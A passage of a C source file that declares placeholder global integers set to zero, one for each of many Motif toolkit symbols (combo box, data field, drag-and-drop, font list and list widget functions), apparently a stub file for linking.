int XmComboBoxDeletePos = 0;
int _XmComboBox_dropDownComboBoxAccelerators = 0;
int _XmComboBox_dropDownListTranslations = 0;
int XmComboBoxSelectItem = 0;
int XmComboBoxSetItem = 0;
int _XmComboBox_textFocusTranslations = 0;
int XmComboBoxUpdate = 0;
int xmComboBoxWidgetClass = 0;
int XmCommandAppendValue = 0;
int xmCommandClassRec = 0;
int XmCommandError = 0;
int XmCommandGetChild = 0;
int _XmCommandReturn = 0;
int XmCommandSetValue = 0;
int _XmCommandUpOrDown = 0;
int xmCommandWidgetClass = 0;
int XmCompareISOLatin1 = 0;
int XmCompareXtWidgetGeometry = 0;
int XmCompareXtWidgetGeometryToWidget = 0;
int _XmComputeVisibilityRect = 0;
int _XmConfigureObject = 0;
int _XmConfigureWidget = 0;
int xmContainerClassRec = 0;
int XmContainerCopy = 0;
int XmContainerCopyLink = 0;
int XmContainerCut = 0;
int _XmContainer_defaultTranslations = 0;
int XmContainerGetItemChildren = 0;
int XmContainerPaste = 0;
int XmContainerPasteLink = 0;
int XmContainerRelayout = 0;
int XmContainerReorder = 0;
int _XmContainer_traversalTranslations = 0;
int xmContainerWidgetClass = 0;
int _XmConvertActionParamToRepTypeId = 0;
int _XmConvertComplete = 0;
int _XmConvertCSToString = 0;
int _XmConvertFactor = 0;
int _XmConvertFloatUnitsToIntUnits = 0;
int _XmConvertHandler = 0;
int _XmConvertHandlerSetLocal = 0;
int _XmConvertStringToUnits = 0;
int XmConvertStringToUnits = 0;
int _XmConvertToBW = 0;
int _XmConvertUnits = 0;
int XmConvertUnits = 0;
int _XmCopyCursorIconQuark = 0;
int XmCopyISOLatin1Lowered = 0;
int _XmCountVaList = 0;
int XmCreateArrowButton = 0;
int XmCreateArrowButtonGadget = 0;
int _XmCreateArrowPixmaps = 0;
int XmCreateBulletinBoard = 0;
int XmCreateBulletinBoardDialog = 0;
int XmCreateButtonBox = 0;
int XmCreateCascadeButton = 0;
int XmCreateCascadeButtonGadget = 0;
int XmCreateColorSelector = 0;
int XmCreateColumn = 0;
int XmCreateCombinationBox2 = 0;
int XmCreateComboBox = 0;
int XmCreateCommand = 0;
int XmCreateCommandDialog = 0;
int XmCreateContainer = 0;
int XmCreateDataField = 0;
int XmCreateDialogShell = 0;
int XmCreateDragIcon = 0;
int XmCreateDrawingArea = 0;
int XmCreateDrawnButton = 0;
int XmCreateDropDown = 0;
int XmCreateDropDownComboBox = 0;
int XmCreateDropDownList = 0;
int XmCreateErrorDialog = 0;
int XmCreateExt18List = 0;
int XmCreateExtended18List = 0;
int XmCreateFileSelectionBox = 0;
int XmCreateFileSelectionDialog = 0;
int _XmCreateFocusData = 0;
int XmCreateFontSelector = 0;
int XmCreateForm = 0;
int XmCreateFormDialog = 0;
int XmCreateFrame = 0;
int XmCreateGrabShell = 0;
int XmCreateIconBox = 0;
int XmCreateIconButton = 0;
int XmCreateIconGadget = 0;
int XmCreateIconHeader = 0;
int XmCreateInformationDialog = 0;
int XmCreateLabel = 0;
int XmCreateLabelGadget = 0;
int XmCreateList = 0;
int XmCreateMainWindow = 0;
int XmCreateMenuBar = 0;
int _XmCreateMenuCursor = 0;
int XmCreateMenuShell = 0;
int XmCreateMessageBox = 0;
int XmCreateMessageDialog = 0;
int XmCreateMultiList = 0;
int XmCreateNotebook = 0;
int XmCreateOptionMenu = 0;
int XmCreateOutline = 0;
int XmCreatePaned = 0;
int XmCreatePanedWindow = 0;
int XmCreatePopupMenu = 0;
int XmCreatePromptDialog = 0;
int XmCreatePulldownMenu = 0;
int XmCreatePushButton = 0;
int XmCreatePushButtonGadget = 0;
int XmCreateQuestionDialog = 0;
int XmCreateRadioBox = 0;
int _XmCreateRenderTable = 0;
int _XmCreateRendition = 0;
int XmCreateRowColumn = 0;
int XmCreateScale = 0;
int XmCreateScrollBar = 0;
int XmCreateScrolledList = 0;
int XmCreateScrolledText = 0;
int XmCreateScrolledWindow = 0;
int XmCreateSelectionBox = 0;
int XmCreateSelectionDialog = 0;
int XmCreateSeparator = 0;
int XmCreateSeparatorGadget = 0;
int XmCreateSimpleCheckBox = 0;
int XmCreateSimpleMenuBar = 0;
int XmCreateSimpleOptionMenu = 0;
int XmCreateSimplePopupMenu = 0;
int XmCreateSimplePulldownMenu = 0;
int XmCreateSimpleRadioBox = 0;
int XmCreateSimpleSpinBox = 0;
int XmCreateSpinBox = 0;
int _XmCreateTab = 0;
int XmCreateTabBox = 0;
int _XmCreateTabList = 0;
int XmCreateTabStack = 0;
int XmCreateTemplateDialog = 0;
int XmCreateText = 0;
int XmCreateTextField = 0;
int XmCreateToggleButton = 0;
int XmCreateToggleButtonGadget = 0;
int XmCreateTree = 0;
int _XmCreateVisibilityRect = 0;
int XmCreateWarningDialog = 0;
int XmCreateWorkArea = 0;
int XmCreateWorkingDialog = 0;
int XmCvtByteStreamToXmString = 0;
int XmCvtCTToXmString = 0;
int XmCvtFromHorizontalPixels = 0;
int XmCvtFromVerticalPixels = 0;
int XmCvtStringToUnitType = 0;
int XmCvtTextPropertyToXmStringTable = 0;
int XmCvtTextToXmString = 0;
int XmCvtToHorizontalPixels = 0;
int XmCvtToVerticalPixels = 0;
int XmCvtXmStringTableToTextProperty = 0;
int XmCvtXmStringToByteStream = 0;
int _XmCvtXmStringToCT = 0;
int XmCvtXmStringToCT = 0;
int XmCvtXmStringToText = 0;
int _XmCvtXmStringToUTF8String = 0;
int XmCvtXmStringToUTF8String = 0;
int _XmDataF_EventBindings1 = 0;
int _XmDataF_EventBindings2 = 0;
int _XmDataF_EventBindings3 = 0;
int _XmDataF_EventBindings4 = 0;
int xmDataFieldClassRec = 0;
int _XmDataFieldConvert = 0;
int XmDataFieldCopy = 0;
int _XmDataFieldCountBytes = 0;
int XmDataFieldCut = 0;
int _XmDataFieldDeselectSelection = 0;
int XmDataFielddf_ClearSelection = 0;
int _XmDataFielddf_SetCursorPosition = 0;
int XmDataFielddf_SetCursorPosition = 0;
int _XmDataFielddf_SetDestination = 0;
int _XmDataFieldDrawInsertionPoint = 0;
int XmDataFieldGetAddMode = 0;
int XmDataFieldGetBaseline = 0;
int XmDataFieldGetCursorPosition = 0;
int _XmDataFieldGetDropReciever = 0;
int XmDataFieldGetEditable = 0;
int XmDataFieldGetInsertionPosition = 0;
int XmDataFieldGetLastPosition = 0;
int XmDataFieldGetMaxLength = 0;
int XmDataFieldGetSelection = 0;
int XmDataFieldGetSelectionPosition = 0;
int XmDataFieldGetSelectionWcs = 0;
int XmDataFieldGetString = 0;
int XmDataFieldGetStringWcs = 0;
int XmDataFieldGetSubstring = 0;
int XmDataFieldGetSubstringWcs = 0;
int XmDataFieldInsert = 0;
int XmDataFieldInsertWcs = 0;
int _XmDataFieldLoseSelection = 0;
int XmDataFieldPaste = 0;
int XmDataFieldPosToXY = 0;
int XmDataFieldRemove = 0;
int XmDataFieldReplace = 0;
int _XmDataFieldReplaceText = 0;
int XmDataFieldReplaceWcs = 0;
int XmDataFieldSetAddMode = 0;
int _XmDataFieldSetClipRect = 0;
int XmDataFieldSetEditable = 0;
int XmDataFieldSetHighlight = 0;
int XmDataFieldSetInsertionPosition = 0;
int XmDataFieldSetMaxLength = 0;
int _XmDataFieldSetSel2 = 0;
int XmDataFieldSetSelection = 0;
int XmDataFieldSetString = 0;
int XmDataFieldShowPosition = 0;
int _XmDataFieldStartSelection = 0;
int xmDataFieldWidgetClass = 0;
int XmDataFieldXYToPos = 0;
int _XmDataFPrimClassExtRec = 0;
int _XmDataFToggleCursorGC = 0;
int XmDeactivateProtocol = 0;
int _XmDefaultColorObj = 0;
int _XmDefaultDragIconQuark = 0;
int _XmdefaultTextActionsTable = 0;
int _XmdefaultTextActionsTableSize = 0;
int _XmDefaultVisualResources = 0;
int xmDesktopClass = 0;
int xmDesktopClassRec = 0;
int xmDesktopObjectClass = 0;
int _XmDestinationHandler = 0;
int _XmDestroyDefaultDragIcon = 0;
int _XmDestroyFocusData = 0;
int _XmDestroyMotifWindow = 0;
int _XmDestroyParentCallback = 0;
int XmDestroyPixmap = 0;
int _XmDestroyTearOffShell = 0;
int xmDialogShellClassRec = 0;
int xmDialogShellExtClassRec = 0;
int xmDialogShellExtObjectClass = 0;
int xmDialogShellWidgetClass = 0;
int _XmDifferentBackground = 0;
int _XmDirectionDefault = 0;
int XmDirectionMatch = 0;
int XmDirectionMatchPartial = 0;
int XmDirectionToStringDirection = 0;
int _XmDismissTearOff = 0;
int _XmDispatchGadgetInput = 0;
int _XmDisplay_baseTranslations = 0;
int xmDisplayClass = 0;
int xmDisplayClassRec = 0;
int xmDisplayObjectClass = 0;
int _XmDoGadgetTraversal = 0;
int XmDragCancel = 0;
int _XmDragC_defaultTranslations = 0;
int xmDragContextClass = 0;
int xmDragContextClassRec = 0;
int xmDragIconClassRec = 0;
int _XmDragIconClean = 0;
int _XmDragIconIsDirty = 0;
int xmDragIconObjectClass = 0;
int _XmDragOverChange = 0;
int _XmDragOverFinish = 0;
int _XmDragOverGetActiveCursor = 0;
int _XmDragOverHide = 0;
int _XmDragOverMove = 0;
int _XmDragOverSetInitialPosition = 0;
int xmDragOverShellClassRec = 0;
int xmDragOverShellWidgetClass = 0;
int _XmDragOverShow = 0;
int XmDragStart = 0;
int _XmDragUnderAnimation = 0;
int _XmDrawArrow = 0;
int XmDrawBevel = 0;
int _XmDrawBorder = 0;
int _XmDrawDiamond = 0;
int _XmDrawDiamondButton = 0;
int _XmDrawHighlight = 0;
int _XmDrawingA_defaultTranslations = 0;
int xmDrawingAreaClassRec = 0;
int _XmDrawingAreaInput = 0;
int xmDrawingAreaWidgetClass = 0;
int _XmDrawingA_traversalTranslations = 0;
int _XmDrawnB_defaultTranslations = 0;
int _XmDrawnB_menuTranslations = 0;
int _XmDrawnBPrimClassExtRec = 0;
int xmDrawnButtonClassRec = 0;
int xmDrawnButtonWidgetClass = 0;
int _XmDrawSeparator = 0;
int _XmDrawShadow = 0;
int _XmDrawShadows = 0;
int _XmDrawShadowType = 0;
int _XmDrawSimpleHighlight = 0;
int _XmDrawSquareButton = 0;
int xmDropDownClassRec = 0;
int XmDropDownGetArrow = 0;
int XmDropDownGetChild = 0;
int XmDropDownGetLabel = 0;
int XmDropDownGetList = 0;
int XmDropDownGetText = 0;
int XmDropDownGetValue = 0;
int xmDropDownWidgetClass = 0;
int XmDropSiteConfigureStackingOrder = 0;
int XmDropSiteEndUpdate = 0;
int XmDropSiteGetActiveVisuals = 0;
int xmDropSiteManagerClassRec = 0;
int xmDropSiteManagerObjectClass = 0;
int XmDropSiteQueryStackingOrder = 0;
int XmDropSiteRegister = 0;
int XmDropSiteRegistered = 0;
int XmDropSiteRetrieve = 0;
int _XmDropSiteShell = 0;
int XmDropSiteStartUpdate = 0;
int XmDropSiteUnregister = 0;
int XmDropSiteUpdate = 0;
int _XmDropSiteWrapperCandidate = 0;
int XmDropTransferAdd = 0;
int xmDropTransferClassRec = 0;
int xmDropTransferObjectClass = 0;
int XmDropTransferStart = 0;
int _XmDSIAddChild = 0;
int _XmDSIDestroy = 0;
int _XmDSIGetBorderWidth = 0;
int _XmDSIGetChildPosition = 0;
int _XmDSIRemoveChild = 0;
int _XmDSIReplaceChild = 0;
int _XmDSISwapChildren = 0;
int _XmDSMGetTreeFromDSM = 0;
int _XmDSMUpdate = 0;
int _XmDSResources = 0;
int XmeAddFocusChangeCallback = 0;
int XmeClearBorder = 0;
int XmeClipboardSink = 0;
int XmeClipboardSource = 0;
int XmeConfigureObject = 0;
int XmeConvertMerge = 0;
int XmeCountVaListSimple = 0;
int XmeCreateClassDialog = 0;
int _XmEditResCheckMessages = 0;
int XmeDragSource = 0;
int XmeDrawArrow = 0;
int XmeDrawCircle = 0;
int XmeDrawDiamond = 0;
int XmeDrawHighlight = 0;
int XmeDrawIndicator = 0;
int XmeDrawPolygonShadow = 0;
int XmeDrawSeparator = 0;
int XmeDrawShadows = 0;
int XmeDropSink = 0;
int XmeFlushIconFileCache = 0;
int XmeFocusIsInShell = 0;
int XmeFromHorizontalPixels = 0;
int XmeFromVerticalPixels = 0;
int XmeGetColorObjData = 0;
int XmeGetDefaultPixel = 0;
int XmeGetDefaultRenderTable = 0;
int XmeGetDesktopColorCells = 0;
int XmeGetDirection = 0;
int XmeGetEncodingAtom = 0;
int XmeGetHomeDirName = 0;
int XmeGetIconControlInfo = 0;
int XmeGetLocalizedString = 0;
int XmeGetMask = 0;
int XmeGetNextCharacter = 0;
int XmeGetNullCursor = 0;
int XmeGetPixelData = 0;
int XmeGetPixmapData = 0;
int XmeGetTextualDragIcon = 0;
int XmeMicroSleep = 0;
int _XmEmptyRect = 0;
int XmeNamedSink = 0;
int XmeNamedSource = 0;
int XmeNamesAreEqual = 0;
int XmeNavigChangeManaged = 0;
int _XmEnterGadget = 0;
int _XmEnterRowColumn = 0;
int _XmEntryByteCountGet = 0;
int _XmEntryCacheGet = 0;
int _XmEntryCharCountGet = 0;
int _XmEntryDirectionGet = 0;
int _XmEntryDirectionSet = 0;
int _XmEntryPopGet = 0;
int _XmEntryPushGet = 0;
int _XmEntryRendBeginCountGet = 0;
int _XmEntryRendBeginGet = 0;
int _XmEntryRendBeginSet = 0;
int _XmEntryRendEndCountGet = 0;
int _XmEntryRendEndGet = 0;
int _XmEntryRendEndSet = 0;
int _XmEntryTabsGet = 0;
int _XmEntryTag = 0;
int _XmEntryTagSet = 0;
int _XmEntryTextGet = 0;
int _XmEntryTextSet = 0;
int _XmEntryTextTypeGet = 0;
int XmeParseUnits = 0;
int XmePrimarySink = 0;
int XmePrimarySource = 0;
int XmeQueryBestCursorSize = 0;
int _XmEraseShadow = 0;
int XmeRedisplayGadgets = 0;
int XmeRemoveFocusChangeCallback = 0;
int XmeRenderTableGetDefaultFont = 0;
int XmeReplyToQueryGeometry = 0;
int XmeResolvePartOffsets = 0;
int XmeSecondarySink = 0;
int XmeSecondarySource = 0;
int XmeSecondaryTransfer = 0;
int XmeSetWMShellTitle = 0;
int XmeStandardConvert = 0;
int XmeStandardTargets = 0;
int XmeStringGetComponent = 0;
int XmeStringIsValid = 0;
int XmeToHorizontalPixels = 0;
int XmeToVerticalPixels = 0;
int XmeTraitGet = 0;
int XmeTraitSet = 0;
int XmeTransferAddDoneProc = 0;
int XmeUseColorObj = 0;
int XmeVirtualToActualKeysyms = 0;
int XmeVLCreateWidget = 0;
int XmeWarning = 0;
int XME_WARNING = 0;
int XmeXpmAttributesSize = 0;
int XmeXpmCreateBufferFromImage = 0;
int XmeXpmCreateBufferFromPixmap = 0;
int XmeXpmCreateBufferFromXpmImage = 0;
int XmeXpmCreateDataFromImage = 0;
int XmeXpmCreateDataFromPixmap = 0;
int XmeXpmCreateDataFromXpmImage = 0;
int XmeXpmCreateImageFromBuffer = 0;
int XmeXpmCreateImageFromData = 0;
int XmeXpmCreateImageFromXpmImage = 0;
int XmeXpmCreatePixmapFromBuffer = 0;
int XmeXpmCreatePixmapFromData = 0;
int XmeXpmCreatePixmapFromXpmImage = 0;
int XmeXpmCreateXpmImageFromBuffer = 0;
int XmeXpmCreateXpmImageFromData = 0;
int XmeXpmCreateXpmImageFromImage = 0;
int XmeXpmCreateXpmImageFromPixmap = 0;
int XmeXpmFree = 0;
int XmeXpmFreeAttributes = 0;
int XmeXpmFreeExtensions = 0;
int XmeXpmFreeXpmImage = 0;
int XmeXpmFreeXpmInfo = 0;
int XmeXpmGetErrorString = 0;
int XmeXpmLibraryVersion = 0;
int XmeXpmReadFileToBuffer = 0;
int XmeXpmReadFileToData = 0;
int XmeXpmReadFileToImage = 0;
int XmeXpmReadFileToPixmap = 0;
int XmeXpmReadFileToXpmImage = 0;
int XmeXpmWriteFileFromBuffer = 0;
int XmeXpmWriteFileFromData = 0;
int XmeXpmWriteFileFromImage = 0;
int XmeXpmWriteFileFromPixmap = 0;
int XmeXpmWriteFileFromXpmImage = 0;
int xmExt18ListClassRec = 0;
int XmExt18ListDeselectItems = 0;
int XmExt18ListDeselectRow = 0;
int XmExt18ListGetSelectedRowArray = 0;
int XmExt18ListGetSelectedRows = 0;
int XmExt18ListMakeRowVisible = 0;
int XmExt18ListSelectAllItems = 0;
int XmExt18ListSelectItems = 0;
int XmExt18ListSelectRow = 0;
int XmExt18ListToggleRow = 0;
int XmExt18ListUnselectAllItems = 0;
int XmExt18ListUnselectItem = 0;
int xmExt18ListWidgetClass = 0;
int xmExtClassRec = 0;
int _XmExtGetValuesHook = 0;
int _XmExtHighlightBorder = 0;
int _XmExtImportArgs = 0;
int _XmExtObjAlloc = 0;
int xmExtObjectClass = 0;
int _XmExtObjFree = 0;
int _XmExtUnhighlightBorder = 0;
int _Xm_fastPtr = 0;
int _XmFastSubclassInit = 0;
int _XmFileSBGeoMatrixCreate = 0;
int xmFileSelectionBoxClassRec = 0;
int _XmFileSelectionBoxCreateDirList = 0;
int _XmFileSelectionBoxCreateDirListLabel = 0;
int _XmFileSelectionBoxCreateFilterLabel = 0;
int _XmFileSelectionBoxCreateFilterText = 0;
int _XmFileSelectionBoxFocusMoved = 0;
int XmFileSelectionBoxGetChild = 0;
int _XmFileSelectionBoxGetDirectory = 0;
int _XmFileSelectionBoxGetDirListItemCount = 0;
int _XmFileSelectionBoxGetDirListItems = 0;
int _XmFileSelectionBoxGetDirListLabelString = 0;
int _XmFileSelectionBoxGetDirMask = 0;
int _XmFileSelectionBoxGetFilterLabelString = 0;
int _XmFileSelectionBoxGetListItemCount = 0;
int _XmFileSelectionBoxGetListItems = 0;
int _XmFileSelectionBoxGetNoMatchString = 0;
int _XmFileSelectionBoxGetPattern = 0;
int _XmFileSelectionBoxNoGeoRequest = 0;
int _XmFileSelectionBoxRestore = 0;
int _XmFileSelectionBoxUpOrDown = 0;
int xmFileSelectionBoxWidgetClass = 0;
int XmFileSelectionDoSearch = 0;
int _XmFilterArgs = 0;
int _XmFilterResources = 0;
int _XmFindNextTabGroup = 0;
int _XmFindPrevTabGroup = 0;
int _XmFindTabGroup = 0;
int _XmFindTopMostShell = 0;
int _XmFindTraversablePrim = 0;
int _XmFocusInGadget = 0;
int _XmFocusIsHere = 0;
int _XmFocusIsInShell = 0;
int _XmFocusModelChanged = 0;
int _XmFocusOutGadget = 0;
int XmFontListAdd = 0;
int XmFontListAppendEntry = 0;
int XmFontListCopy = 0;
int XmFontListCreate = 0;
int XmFontListCreate_r = 0;
int XmFontListEntryCreate = 0;
int XmFontListEntryCreate_r = 0;
int XmFontListEntryFree = 0;
int XmFontListEntryGetFont = 0;
int XmFontListEntryGetTag = 0;
int XmFontListEntryLoad = 0;
int XmFontListFree = 0;
int XmFontListFreeFontContext = 0;
int _XmFontListGetDefaultFont = 0;
int XmFontListGetNextFont = 0;
int XmFontListInitFontContext = 0;
int XmFontListNextEntry = 0;
int XmFontListRemoveEntry = 0;
int _XmFontListSearch = 0;
int xmFontSelectorClassRec = 0;
int xmFontSelectorWidgetClass = 0;
int _XmForegroundColorDefault = 0;
int xmFormClassRec = 0;
int xmFormWidgetClass = 0;
int xmFrameClassRec = 0;
int _XmFrame_defaultTranslations = 0;
int xmFrameWidgetClass = 0;
int _XmFreeDragReceiverInfo = 0;
int _XmFreeHashTable = 0;
int _XmFreeMotifAtom = 0;
int _XmFreeScratchPixmap = 0;
int _XmFreeTravGraph = 0;
int _XmFreeWidgetExtData = 0;
int _XmFromHorizontalPixels = 0;
int _XmFromLayoutDirection = 0;
int _XmFromPanedPixels = 0;
int _XmFromVerticalPixels = 0;
int _XmGadClassExtRec = 0;
int _XmGadgetActivate = 0;
int _XmGadgetArm = 0;
int _XmGadgetButtonMotion = 0;
int xmGadgetClass = 0;
int xmGadgetClassRec = 0;
int _XmGadgetDrag = 0;
int _XmGadgetGetValuesHook = 0;
int _XmGadgetImportArgs = 0;
int _XmGadgetImportSecondaryArgs = 0;
int _XmGadgetKeyInput = 0;
int _XmGadgetMultiActivate = 0;
int _XmGadgetMultiArm = 0;
int _XmGadgetSelect = 0;
int _XmGadgetTraverseCurrent = 0;
int _XmGadgetTraverseDown = 0;
int _XmGadgetTraverseHome = 0;
int _XmGadgetTraverseLeft = 0;
int _XmGadgetTraverseNext = 0;
int _XmGadgetTraverseNextTabGroup = 0;
int _XmGadgetTraversePrev = 0;
int _XmGadgetTraversePrevTabGroup = 0;
int _XmGadgetTraverseRight = 0;
int _XmGadgetTraverseUp = 0;
int _XmGadgetWarning = 0;
int _XmGeoAdjustBoxes = 0;
int _XmGeoArrangeBoxes = 0;
int _XmGeoBoxesSameHeight = 0;
int _XmGeoBoxesSameWidth = 0;
int _XmGeoClearRectObjAreas = 0;
int _XmGeoCount_kids = 0;
int _XmGeoGetDimensions = 0;
int _XmGeoLoadValues = 0;
int _XmGeoMatrixAlloc = 0;
int _XmGeoMatrixFree = 0;
int _XmGeoMatrixGet = 0;
int _XmGeoMatrixSet = 0;
int _XmGeometryEqual = 0;
int _XmGeoReplyYes = 0;
int _XmGeoSetupKid = 0;
int _XmGetActiveDropSite = 0;
int _XmGetActiveItem = 0;
int _XmGetActiveProtocolStyle = 0;
int _XmGetActiveTabGroup = 0;
int _XmGetActiveTopLevelMenu = 0;
int _XmGetActualClass = 0;
int _XmGetArrowDrawRects = 0;
int XmGetAtomName = 0;
int _XmGetAudibleWarning = 0;
int _XmGetBGPixmapName = 0;
int _XmGetBitmapConversionModel = 0;
int _XmGetBottomShadowColor = 0;
int _XmGetClassExtensionPtr = 0;
int _XmGetColorAllocationProc = 0;
int XmGetColorCalculation = 0;
int _XmGetColorCalculationProc = 0;
int _XmGetColoredPixmap = 0;
int _XmGetColors = 0;
int XmGetColors = 0;
int _XmGetDefaultBackgroundColorSpec = 0;
int _XmGetDefaultColors = 0;
int _XmGetDefaultDisplay = 0;
int _XmGetDefaultFontList = 0;
int _XmGetDefaultThresholdsForScreen = 0;
int _XmGetDefaultTime = 0;
int XmGetDestination = 0;
int _XmGetDisplayObject = 0;
int XmGetDragContext = 0;
int _XmGetDragContextFromHandle = 0;
int _XmGetDragCursorCachePtr = 0;
int _XmGetDragProtocolStyle = 0;
int _XmGetDragProxyWindow = 0;
int _XmGetDragReceiverInfo = 0;
int _XmGetDropSiteManagerObject = 0;
int _XmGetEffectiveView = 0;
int _XmGetEncodingRegistryTarget = 0;
int _XmGetFirstFocus = 0;
int _XmGetFirstFont = 0;
int _XmGetFocus = 0;
int _XmGetFocusData = 0;
int _XmGetFocusFlag = 0;
int _XmGetFocusPolicy = 0;
int _XmGetFocusResetFlag = 0;
int XmGetFocusWidget = 0;
int _XmGetFontUnit = 0;
int _XmGetHashEntryIterate = 0;
int _XmGetHighlightColor = 0;
int _XmGetIconControlInfo = 0;
int XmGetIconFileName = 0;
int _XmGetIconPixmapName = 0;
int _XmGetImage = 0;
int _XmGetImageAndHotSpotFromFile = 0;
int _XmGetImageFromFile = 0;
int _XmGetInDragMode = 0;
int _XmGetInsensitiveStippleBitmap = 0;
int _XmGetKidGeo = 0;
int _XmGetLayoutDirection = 0;
int _XmGetManagedInfo = 0;
int _XmGetMaxCursorSize = 0;
int _XmGetMBStringFromXmString = 0;
int XmGetMenuCursor = 0;
int _XmGetMenuCursorByScreen = 0;
int _XmGetMenuProcContext = 0;
int _XmGetMenuState = 0;
int _XmGetMotifAtom = 0;
int _XmGetMoveOpaqueByScreen = 0;
int _XmGetNavigability = 0;
int _XmGetNavigationType = 0;
int _Xm_GetNewElement = 0;
int XmGetNewPictureState = 0;
int _XmGetNullCursor = 0;
int _XmGetPixelData = 0;
int _XmGetPixmap = 0;
int XmGetPixmap = 0;
int _XmGetPixmapBasedGC = 0;
int XmGetPixmapByDepth = 0;
int _XmGetPixmapData = 0;
int _XmGetPointVisibility = 0;
int _XmGetPopupMenuClick = 0;
int XmGetPostedFromWidget = 0;
int _XmGetRC_PopupPosted = 0;
int _XmGetRealXlations = 0;
int _XmGetScaledPixmap = 0;
int XmGetScaledPixmap = 0;
int _XmGetScreenObject = 0;
int XmGetSecondaryResourceData = 0;
int _XmGetTabGroup = 0;
int XmGetTabGroup = 0;
int XmGetTearOffControl = 0;
int _XmGetTextualDragIcon = 0;
int XmGetToolTipString = 0;
int _XmGetTopShadowColor = 0;
int _XmGetTransientFlag = 0;
int _XmGetUnitType = 0;
int _XmGetUnpostBehavior = 0;
int XmGetVisibility = 0;
int _XmGetWidgetExtData = 0;
int _XmGetWidgetNavigPtrs = 0;
int _XmGetWorldObject = 0;
int _XmGetWrapperData = 0;
int XmGetXmDisplay = 0;
int _XmGetXmDisplayClass = 0;
int XmGetXmScreen = 0;
int _XmGMCalcSize = 0;
int _XmGMDoLayout = 0;
int _XmGMEnforceMargin = 0;
int _XmGMHandleGeometryManager = 0;
int _XmGMHandleQueryGeometry = 0;
int _XmGMOverlap = 0;
int _XmGMReplyToQueryGeometry = 0;
int _XmGrabKeyboard = 0;
int _XmGrabPointer = 0;
int xmGrabShellClassRec = 0;
int _XmGrabShell_translations = 0;
int xmGrabShellWidgetClass = 0;
int _XmGrabTheFocus = 0;
int _XmHandleGeometryManager = 0;
int _XmHandleMenuButtonPress = 0;
int _XmHandleQueryGeometry = 0;
int _XmHandleSizeUpdate = 0;
int _XmHashTableCount = 0;
int _XmHashTableSize = 0;
int _XmHeapAlloc = 0;
int _XmHeapCreate = 0;
int _XmHeapFree = 0;
int xmHierarchyClassRec = 0;
int XmHierarchyGetChildNodes = 0;
int XmHierarchyOpenAllAncestors = 0;
int xmHierarchyWidgetClass = 0;
int _XmHighlightBorder = 0;
int _XmHighlightColorDefault = 0;
int _XmHighlightPixmapDefault = 0;
int _XmHWQuery = 0;
int xmI18ListClassRec = 0;
int XmI18ListDeselectItems = 0;
int XmI18ListDeselectRow = 0;
int XmI18ListDoSearch = 0;
int XmI18ListFindRow = 0;
int XmI18ListGetSelectedRowArray = 0;
int XmI18ListGetSelectedRows = 0;
int XmI18ListMakeRowVisible = 0;
int XmI18ListSelectAllItems = 0;
int XmI18ListSelectItems = 0;
int XmI18ListSelectRow = 0;
int XmI18ListToggleRow = 0;
int xmI18ListWidgetClass = 0;
int _XmICCCallbackToICCEvent = 0;
int _XmICCEventToICCCallback = 0;
int xmIconBoxClassRec = 0;
int XmIconBoxIsCellEmpty = 0;
int xmIconBoxWidgetClass = 0;
int xmIconButtonClassRec = 0;
int xmIconButtonWidgetClass = 0;
int xmIconGadgetClass = 0;
int xmIconGadgetClassRec = 0;
int _XmIconGadgetIconPos = 0;
int xmIconGCacheObjClassRec = 0;
int xmIconHeaderClass = 0;
int xmIconHeaderClassRec = 0;
int _XmIEndUpdate = 0;
int _XmImChangeManaged = 0;
int XmImCloseXIM = 0;
int _XmImFreeShellData = 0;
int XmImFreeXIC = 0;
int XmImGetXIC = 0;
int XmImGetXICResetState = 0;
int XmImGetXIM = 0;
int XmImMbLookupString = 0;
int XmImMbResetIC = 0;
int _XmImRealize = 0;
int _XmImRedisplay = 0;
int XmImRegister = 0;
int _XmImResize = 0;
int XmImSetFocusValues = 0;
int XmImSetValues = 0;
int XmImSetXIC = 0;
int XmImUnregister = 0;
int XmImUnsetFocus = 0;
int XmImVaSetFocusValues = 0;
int XmImVaSetValues = 0;
int _XmIndexToTargets = 0;
int _XmInheritClass = 0;
int _XmInImageCache = 0;
int _XmInitByteOrderChar = 0;
int _XmInitializeExtensions = 0;
int _XmInitializeMenuCursor = 0;
int _XmInitializeScrollBars = 0;
int _XmInitializeSyntheticResources = 0;
int _XmInitializeTraits = 0;
int _XmInitModifiers = 0;
int _XmInitTargetsTable = 0;
int _XmInputForGadget = 0;
int _XmInputInGadget = 0;
int _XmInstallImage = 0;
int XmInstallImage = 0;
int _XmInstallPixmap = 0;
int _XmInstallProtocols = 0;
int XmInternAtom = 0;
int _XmIntersectionOf = 0;
int _XmIntersectRect = 0;
int _XmInvalidCursorIconQuark = 0;
int _XmIsActiveTearOff = 0;
int _XmIsEventUnique = 0;
int _XmIsFastSubclass = 0;
int _XmIsISO10646 = 0;
int XmIsMotifWMRunning = 0;
int _XmIsNavigable = 0;
int _XmIsScrollableClipWidget = 0;
int _XmIsSlowSubclass = 0;
int _XmIsStandardMotifWidgetClass = 0;
int _XmIsSubclassOf = 0;
int _XmIsTearOffShellDescendant = 0;
int XmIsTraversable = 0;
int _XmIsViewable = 0;
int _XmJpegErrorExit = 0;
int _XmJpegGetImage = 0;
int _XmLabel_AccessTextualRecord = 0;
int _XmLabelCacheCompare = 0;
int _XmLabelCalcTextRect = 0;
int xmLabelClassRec = 0;
int _XmLabelCloneMenuSavvy = 0;
int _XmLabelConvert = 0;
int _XmLabel_defaultTranslations = 0;
int _XmLabelGadClassExtRec = 0;
int xmLabelGadgetClass = 0;
int xmLabelGadgetClassRec = 0;
int xmLabelGCacheObjClassRec = 0;
int _XmLabelGCalcTextRect = 0;
int _XmLabelGCloneMenuSavvy = 0;
int _XmLabelGCVTRedraw = 0;
int _XmLabel_menuTranslations = 0;
int _XmLabel_menu_traversal_events = 0;
int _XmLabelPrimClassExtRec = 0;
int _XmLabelSetBackgroundGC = 0;
int xmLabelWidgetClass = 0;
int _XmLeafPaneFocusOut = 0;
int _XmLeaveGadget = 0;
int _XmLinkCursorIconQuark = 0;
int _XmListAddAfter = 0;
int _XmListAddBefore = 0;
int XmListAddItem = 0;
int XmListAddItems = 0;
int XmListAddItemsUnselected = 0;
int XmListAddItemUnselected = 0;
int xmListClassRec = 0;
int _XmListCount = 0;
int XmListDeleteAllItems = 0;
int XmListDeleteItem = 0;
int XmListDeleteItems = 0;
int XmListDeleteItemsPos = 0;
int XmListDeletePos = 0;
int XmListDeletePositions = 0;
int XmListDeselectAllItems = 0;
int XmListDeselectItem = 0;
int XmListDeselectPos = 0;
int _XmListExec = 0;
int _XmListFree = 0;
int XmListGetKbdItemPos = 0;
